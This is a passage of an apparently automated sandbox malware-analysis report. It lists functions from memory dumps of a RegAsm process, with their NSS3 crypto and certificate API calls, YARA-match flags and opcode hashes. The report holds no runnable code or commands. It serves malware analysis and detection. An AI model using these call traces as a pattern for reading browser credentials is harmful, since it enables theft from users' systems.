                                                                                                                                                                                                                                                                    • Part of subcall function 6C93B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C93B9C8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C93B9E1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C980A50: SECOID_GetAlgorithmTag_Util.NSS3(6C982A90,E8571076,?,6C982A7C,6C9821F1,?,?,?,00000000,00000000,?,?,6C9821DD,00000000), ref: 6C980A66
                                                                                                                                                                                                                                                                    • Part of subcall function 6C983310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C982D1E,?,?,?,?,00000000,?,?,?,?,?,6C981289), ref: 6C983348
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9806F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C982E70,00000000), ref: 6C980701
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2288138528-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                                                                                                                                                                                                  • Instruction ID: 546910876e7d8ceef44724d552ee6d25d5eb0ffd24419e402e041f74fc6387a7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11310CB29026056BDB009E64EC44E9A3B69BF6531DF140530FD159BB91E731E528C7A2
                                                                                                                                                                                                                                                                  Function 6C916C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C916C8D
                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C916CA9
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C916CC0
                                                                                                                                                                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CA38FE0), ref: 6C916CFE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2370200771-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5baf8dd862cf0337621d920a2a210c8d5695710a69952acf9b704c26a24a69bb
                                                                                                                                                                                                                                                                  • Instruction ID: 51258ad5a84a189b5665bfd68484339cf63f6d5d05f4abe94db34c2219221c8b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5baf8dd862cf0337621d920a2a210c8d5695710a69952acf9b704c26a24a69bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 893170B5E0521A9FDB04CF65C852ABFBBF9EB55248B10442DD905D7B40EB31D905CBA0
                                                                                                                                                                                                                                                                  Function 004117AA Relevance: 6.1, APIs: 4, Instructions: 92stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strtok_s$H_prolog
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1158113254-0
                                                                                                                                                                                                                                                                  • Opcode ID: 41f4a85633314238a50996da74d7f340be29094ab8e387c842f218635180a804
                                                                                                                                                                                                                                                                  • Instruction ID: 0f016b6c19d62f4a383ec4c208f60cc7245461e1a48e41b796f339672d39a54f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41f4a85633314238a50996da74d7f340be29094ab8e387c842f218635180a804
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66210571600505AFCB18EF60C9D1EEBB3ACEF14314B10803FE617D6991EB38E986C654
                                                                                                                                                                                                                                                                  Function 0041162F Relevance: 6.1, APIs: 4, Instructions: 78stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00411634
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0041165B
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00426554,00000001,?,?,?,00416ED4), ref: 00411697
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004116D3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strtok_s$H_prologlstrcpylstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 539094379-0
                                                                                                                                                                                                                                                                  • Opcode ID: d2738cfee78ca2e6f5de626fb3f7c02bc618f1e3490a7e38134044452132fd70
                                                                                                                                                                                                                                                                  • Instruction ID: 2243f29b9414ee3a0905d1ffd7d22fb608f81ec071414b529d828bb519633361
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2738cfee78ca2e6f5de626fb3f7c02bc618f1e3490a7e38134044452132fd70
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4221D371600505ABCB14DFA5C981FEF73ACEF04314F14413FE516E65A1EB38EA858A69
                                                                                                                                                                                                                                                                  Function 6C990C00 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_DigestOp.NSS3(?,?,00000004), ref: 6C990C43
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93DEF0: TlsGetValue.KERNEL32 ref: 6C93DF37
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93DEF0: EnterCriticalSection.KERNEL32(?), ref: 6C93DF4B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93DEF0: PR_SetError.NSS3(00000000,00000000), ref: 6C93E02B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93DEF0: PR_Unlock.NSS3(?), ref: 6C93E07E
                                                                                                                                                                                                                                                                  • PK11_DigestOp.NSS3(?,?,00000008), ref: 6C990C85
                                                                                                                                                                                                                                                                  • PK11_DigestOp.NSS3(?,?,?), ref: 6C990C9F
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFD07F,00000000), ref: 6C990CB4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DigestK11_$Error$CriticalEnterSectionUnlockValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3186484790-0
                                                                                                                                                                                                                                                                  • Opcode ID: 89c726c438febee19cafaa20c925acc2bdc3eb78823e450f8cbe980564cecb39
                                                                                                                                                                                                                                                                  • Instruction ID: 28a76e00829c8f28eb27799a7767156dc5b904a2caf24ee9f7a3c74033222728
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89c726c438febee19cafaa20c925acc2bdc3eb78823e450f8cbe980564cecb39
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 612128715042869FCB01CB68DC15B9BBFA8AF35204F0EC1A9E8585F752E731D828C7E2
                                                                                                                                                                                                                                                                  Function 6C93ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CERT_NewCertList.NSS3 ref: 6C93ACC2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C912F0A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C912F1D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C910A1B,00000000), ref: 6C912AF0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C912B11
                                                                                                                                                                                                                                                                  • CERT_DestroyCertList.NSS3(00000000), ref: 6C93AD5E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9557D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C91B41E,00000000,00000000,?,00000000,?,6C91B41E,00000000,00000000,00000001,?), ref: 6C9557E0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9557D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C955843
                                                                                                                                                                                                                                                                  • CERT_DestroyCertList.NSS3(?), ref: 6C93AD36
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F50: CERT_DestroyCertificate.NSS3(?), ref: 6C912F65
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C912F83
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C93AD4F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 132756963-0
                                                                                                                                                                                                                                                                  • Opcode ID: a753bf648f819d2711049875290816c68527faf898a49db4dc2c072f3383b09f
                                                                                                                                                                                                                                                                  • Instruction ID: 88e9d7062f2c873e6e351d65f508a7f9910b1d04357db009e60a42fb238bca54
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a753bf648f819d2711049875290816c68527faf898a49db4dc2c072f3383b09f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C21C6B1D002288BEF11DFA4D8055EEB7B4EF25208F459068D8197B710FB31EA55CBA1
                                                                                                                                                                                                                                                                  Function 6C963C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C963C9E
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C963CAE
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C963CEA
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C963D02
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 284873373-0
                                                                                                                                                                                                                                                                  • Opcode ID: 31899193b16aef31322d34f32b55c847d18c264b798bf1b6f312d61d18919a4a
                                                                                                                                                                                                                                                                  • Instruction ID: 2fad342cc1473ef4216d46ea9798040607f3d1f7f02d8f3d0cd8270a97f52091
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31899193b16aef31322d34f32b55c847d18c264b798bf1b6f312d61d18919a4a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6311B479A00214AFEB00AF25DC48A9A3778FF59368F158065FD0897B11E734ED45CBE0
                                                                                                                                                                                                                                                                  Function 6C96ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C96F0AD,6C96F150,?,6C96F150,?,?,?), ref: 6C96ECBA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9187ED,00000800,6C90EF74,00000000), ref: 6C971000
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970FF0: PR_NewLock.NSS3(?,00000800,6C90EF74,00000000), ref: 6C971016
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970FF0: PL_InitArenaPool.NSS3(00000000,security,6C9187ED,00000008,?,00000800,6C90EF74,00000000), ref: 6C97102B
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C96ECD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C96ED02
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97116E
                                                                                                                                                                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C96ED5A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2957673229-0
                                                                                                                                                                                                                                                                  • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                  • Instruction ID: a9cedf248f1b2fd2a96d375b5c292df7420bbd29d13cbc215d4f00dc648c1e15
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57219FB1A017429BE700CF26DD54B52B7E4BFA5348F25C219A81C87AA1FB70E594C6E0
                                                                                                                                                                                                                                                                  Function 004191A9 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                  • Instruction ID: ddda5ce27789ed79c2448d7412362e472054e5f9d763ea1272038661c493aef2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7911803244004EBBCF125E84CC55CEE3F23BB1D354B58885AFE2859131C73AC9B2AB85
                                                                                                                                                                                                                                                                  Function 6C9BAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C9A5F17,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BAC94
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C9A5F17,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BACA6
                                                                                                                                                                                                                                                                  • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BACC0
                                                                                                                                                                                                                                                                  • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9BACDB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
